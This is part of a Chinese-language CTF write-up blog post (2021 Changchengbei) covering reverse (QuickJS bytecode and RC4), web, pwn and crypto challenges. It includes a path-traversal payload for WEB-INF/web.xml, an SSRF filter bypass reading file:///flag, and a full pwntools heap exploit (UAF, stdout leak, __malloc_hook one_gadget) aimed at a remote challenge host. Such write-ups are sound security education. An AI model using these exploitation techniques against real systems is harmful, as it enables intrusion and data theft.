        get_loc3 3: temp
        put_array_el
        inc_loc 1: i
        goto8 31
   81:  push_0 0
        put_loc2 2: x
        push_0 0
        put_loc8 4: y
        array_from 0
        put_loc8 5: out
        push_0 0
        put_loc1 1: i
   93:  get_loc1 1: i
        get_arg0 0: data
        get_length
        lt
        if_false8 184
        get_arg0 0: data
        get_field2 charCodeAt
        get_loc1 1: i
        call_method 1
        put_loc8 6: code
        get_loc2 2: x
        push_1 1
        add
        push_i16 256
        mod
        put_loc2 2: x
        get_loc8 4: y
        get_loc0 0: box
        get_loc2 2: x
        get_array_el
        add
        push_i16 256
        mod
        put_loc8 4: y
        get_loc0 0: box
        get_loc2 2: x
        get_array_el
        put_loc3 3: temp
        get_loc0 0: box
        get_loc2 2: x
        to_propkey2
        get_loc0 0: box
        get_loc8 4: y
        get_array_el
        put_array_el
        get_loc0 0: box
        get_loc8 4: y
        get_loc3 3: temp
        put_array_el
        get_loc0 0: box
        get_loc2 2: x
        get_array_el
        get_loc0 0: box
        get_loc8 4: y
        get_array_el
        add
        push_i16 256
        mod
        put_loc8 7: k
        get_loc8 5: out
        get_field2 push
        get_loc8 6: code
        get_loc0 0: box
        get_loc8 7: k
        get_array_el
        xor
        call_method 1
        drop
        inc_loc 1: i
        goto8 93
  184:  get_loc8 5: out
        return

0468:  0a                           bigint {
0469:  00                           }
046a:  0a                           bigint {
046b:  00                           }
046c:  0a                           bigint {
046d:  e8 01 07                       len=7
0470:  44 b8 90 b5 6b 67 80         }
0477:  0a                           bigint {
0478:  e8 01 07                       len=7
047b:  34 a7 b8 48 7f 8d af         }
0482:  0a                           bigint {
0483:  00                           }
0484:  0a                           bigint {
0485:  28 01                          len=1
0487:  fe                           }
0488:  0a                           bigint {
0489:  28 01                          len=1
048b:  fe                           }
                                  }
                                }
source.js:1: function: <eval>
  locals:
    0: var <ret>
  stack_size: 32
  opcodes:
        check_define_var rc4,64
        check_define_var sn,0
        check_define_var i,0
        check_define_var j,0
        check_define_var k,0
        check_define_var l,0
        check_define_var m,0
        check_define_var n,0
        check_define_var un,0
        check_define_var arr,0
        check_define_var cipher,0
        check_define_var i,0
        fclosure8 0: [bytecode rc4]
        define_func rc4,0
        define_var sn,0
        define_var i,0
        define_var j,0
        define_var k,0
        define_var l,0
        define_var m,0
        define_var n,0
        define_var un,0
        define_var arr,0
        define_var cipher,0
        define_var i,0
        push_atom_value "2021quickjs_happygame"
        dup
        put_var un
        drop
        push_atom_value "************************************"
        dup
        put_var sn
        put_loc0 0: "<ret>"
        push_i16 150
        push_i16 224
        push_i16 244
        push_i8 68
        push_i8 61
        push_i8 125
        push_i8 8
        push_i16 239
        push_i16 203
        push_i16 254
        push_i16 241
        push_i8 113
        push_i16 213
        push_i16 176
        push_i8 64
        push_i8 106
        push_i8 103
        push_i16 166
        push_i16 185
        push_i16 159
        push_i16 158
        push_i16 172
        push_i8 9
        push_i16 213
        push_i16 239
        push_i8 12
        push_i8 100
        push_i16 185
        push_i8 90
        push_i16 174
        push_i8 107
        push_i16 131
        array_from 32
        push_i16 223
        define_field "32"
        push_i8 122
        define_field "33"
        push_i16 229
        define_field "34"
        push_i16 157
        define_field "35"
        dup
        put_var arr
        drop
        push_const8 1: 0n
        dup
        put_var m
        put_loc0 0: "<ret>"
        push_const8 2: 0n
        dup
        put_var n
        put_loc0 0: "<ret>"
        push_0 0
        dup
        put_var l
        put_loc0 0: "<ret>"
        push_0 0
        dup
        put_var k
        put_loc0 0: "<ret>"
        get_var rc4
        get_var sn
        get_var un
        call2 2
        dup
        put_var cipher
        drop
        undefined
        put_loc0 0: "<ret>"
        push_0 0
        dup
        put_var i
        drop
  361:  get_var i
        get_var cipher
        get_length
        lt
        if_false8 484
        get_var cipher
        get_var i
        get_array_el
        dup
        put_var j
        put_loc0 0: "<ret>"
        get_var j
        push_i8 56
        push_i8 17
        sub
        xor
        dup
        put_var l
        put_loc0 0: "<ret>"
        undefined
        put_loc0 0: "<ret>"
        get_var l
        get_var arr
        get_var k
        get_array_el
        eq
        if_false8 446
        get_var m
        post_inc
        put_var m
        put_loc0 0: "<ret>"
        goto8 458
  446:  get_var n
        post_inc
        put_var n
        put_loc0 0: "<ret>"
  458:  get_var k
        post_inc
        put_var k
        put_loc0 0: "<ret>"
        get_var i
        post_inc
        put_var i
        drop
        goto8 361
  484:  undefined
        put_loc0 0: "<ret>"
        get_var m
        get_var cipher
        get_length
        eq
        if_false8 520
        get_var n
        push_0 0
        eq
        if_false8 520
        push_const8 3: 18071254662143010n
        dup
        put_var n
        put_loc0 0: "<ret>"
        goto8 529
  520:  push_const8 4: 24706849372394394n
        dup
        put_var n
        put_loc0 0: "<ret>"
  529:  push_empty_string
        dup
        put_var s
        put_loc0 0: "<ret>"
        undefined
        put_loc0 0: "<ret>"
  539:  get_var n
        push_const8 5: 0n
        gt
        if_false8 606
        get_var s
        get_var String
        get_field2 fromCharCode
        get_var Number
        get_var n
        push_const8 6: 127n
        mod
        call1 1
        call_method 1
        add
        dup
        put_var s
        put_loc0 0: "<ret>"
        get_var n
        push_const8 7: 127n
        div
        dup
        put_var n
        put_loc0 0: "<ret>"
        goto8 539
  606:  get_var print
        get_var s
        call1 1
        set_loc0 0: "<ret>"
        return

Error...

审一下bytecode发现很简单,就是一个rc4,然后把密文异或了一下进行比对。(一大堆其实就是去数组,然后还有就比对,如果正确cout就+1然后判断一下而已)

其中

    get_var j    push_i8 56    push_i8 17    sub    xor

这里做得时候有点迷,然后自己写了一个js,然后编译,再看

如果是 j=(j-56)^17发现不对,然后想了一下堆栈,应该是(56-17)^j

最终exp:

s=[150, 224, 244,68,61,125,8, 239, 203, 254, 241,113, 213, 176,64,106,103,
   166, 185, 159, 158, 172,9, 213, 239,12,100, 185,90, 174,107, 131,223,122,
   229,157]



from Crypto.Cipher import ARC4
key=b'2021quickjs_happygame'
enc=[]
for i in range(len(s)):
    enc.append((s[i])^(56-17))
print(enc)
enc=bytearray(enc)
ar=ARC4.new(key)

print(ar.decrypt(enc))
# sn='************************************'

#b'flag{2021_9u1ck_1s_v3r7_1nT3r3st1n9}'

Web

java_url

打开网站源代码有一个 /download?filename=

通过/download?filename=../../../../WEB-INF/web.xml方式下载WEB-INF/web.xml文件然后去读class文件,然后在反编译代码审计。

发现存在一个ssrf漏洞,并且过滤了一些协议不过这些协议可以绕过。

直接绕协议

/testURL?url=%0afile:///flag

ez_python

网刃杯原题

链接:https://www.wolai.com/atao/j1B9DkYnEVRtVhrdJ2FPr8?theme=light

Pwn

K1ng_in_h3Ap_I

解题思路

有uaf漏洞,输入666会给出printf的低六位,不用爆破了直接利用unsortedbin残余指针覆盖低位准确申请到stdout的上面,改写stdout泄露libc,最后用realloc调整rsp,打onegadget。

exp

from pwn import *
#p=process('./pwn')
p=remote('47.104.175.110',20066)

libc=ELF('/home/root2/Desktop/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')

def add(id,size):
    p.sendlineafter('>> ',str(1))
    p.sendlineafter('input index:',str(id))
    p.sendlineafter('input size:',str(size))

 

def delete(id):
    p.sendlineafter('>> ',str(2))
    p.sendlineafter('input index:',str(id))

 

def edit(id,con):
    p.sendlineafter('>> ',str(3))
    p.sendlineafter('input index:',str(id))
    p.sendlineafter('input context:',str(con))

 

p.sendlineafter('>> ','666')
p.recvuntil('0x')
off=int(p.recv(6),16)-0x342810+0x6b25dd

off1=off&0xff
off2=(off/0x100)&0xff
off3=(off/0x10000)

add(0,0xd0)
add(1,0x60)
add(2,0x10)
delete(0)
add(3,0x60)
add(4,0x60)
delete(4)
delete(1)
edit(1,'\x00')
edit(0,p8(off1)+p8(off2)+p8(off3))
add(5,0x60)
add(6,0x60)
add(7,0x60)
edit(7,'\x00'*0x33+p64(0xfbad1800)+p64(0)*3+'\x00')

libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x7f352f81c600+0x7f352f457000

p.sendline('2')
p.sendlineafter('input index:','5')
delete(6)
edit(6,p64(libc_base+libc.sym['__malloc_hook']-0x23))

p.sendline('1')
p.sendlineafter('input index:',str(7))
p.sendlineafter('input size:',str(0x60))
p.sendline('1')
p.sendlineafter('input index:',str(8))
p.sendlineafter('input size:',str(0x60))
edit(8,'a'*(0x13-8)+p64(libc_base+0x4527a)+p64(8+libc_base+libc.sym['__libc_realloc']))
p.interactive()

Cry

baby_rsa

首先enc2,给了n,e,c和n的一个因数(不是素数),尽管这个通过这个因数可以求到其它三个因数和,但是已知三个因数和三个因数积也不能求出,但是明文是小于512比特的,而已知因数大于513,如果能分解的话就能直接用这个因数解

确实可以所以over

Enc1显得迷茫些,只给了c,n都不给了,但是可以发现的是p是由幂指数产生的,而且比特位有个很小的范围,尽管v,m未知,至少m的范围很小,可以固定m的范围爆破最终求解,同样地,明文m<p所以只需要用一个素数解,只需要爆破一个素数。

from gmpy2 import *
from Crypto.Util.number import *
#de2
p=[191,193,627383,1720754738477317127758682285465031939891059835873975157555031327070111123628789833299433549669619325160679719355338187877758311485785197492710491]

n,phi=1,1
for i in p:
  n*=i
  phi*=(i-1)

e=65537
d=invert(e,phi)

c=40625981017250262945230548450738951725566520252163410124565622126754739693681271649127104109038164852787767296403697462475459670540845822150397639923013223102912674748402427501588018866490878394678482061561521253365550029075565507988232729032055298992792712574569704846075514624824654127691743944112075703814043622599530496100713378696761879982542679917631570451072107893348792817321652593471794974227183476732980623835483991067080345184978482191342430627490398516912714451984152960348899589532751919272583098764118161056078536781341750142553197082925070730178092561314400518151019955104989790911460357848366016263083

m=pow(c,d,n)
print(long_to_bytes(m))

#de1

c=15808773921165746378224649554032774095198531782455904169552223303513940968292896814159288417499220739875833754573943607047855256739976161598599903932981169979509871591999964856806929597805904134099901826858367778386342376768508031554802249075072366710038889306268806744179086648684738023073458982906066972340414398928411147970593935244077925448732772473619783079328351522269170879807064111318871074291073581343039389561175391039766936376267875184581643335916049461784753341115227515163545709454746272514827000601853735356551495685229995637483506735448900656885365353434308639412035003119516693303377081576975540948311

e=65537

for m in range(1023,-1,-1):
    print(m)
    for v in range(1023):
        p=pow(v,m+1)-pow(v+1,m)
        l=len(bin(p)[2:])
        if l>1024:
            d=invert(e,p-1)
            flag=long_to_bytes(pow(c,d,p))
            if b'flag' in flag:
                print(flag)
                break
            break

#flag{8102c552-3d78-4a42-b659-0c96ef827f05}

2021第一届长城杯网络安全大赛WP

https://wp.n03tack.top/posts/11556/

作者

n03tAck

发布于

2021-09-19

更新于

2021-09-20

许可协议

# 相关文章
  1.2022第二届网刃杯WP
  2.2021NCTF比赛WP
  3.2021安询杯wp
  4.2021陇原战疫WP
  5.2021bytectf线上WP
  6.2021绿城杯wp
  7.2021第五空间大赛WP
  8.2021网刃杯WP

喜欢这篇文章?打赏一下作者吧

目录

关注我

:D 一言句子获取中...

链接

最新文章

归档

标签

WP1

订阅更新

×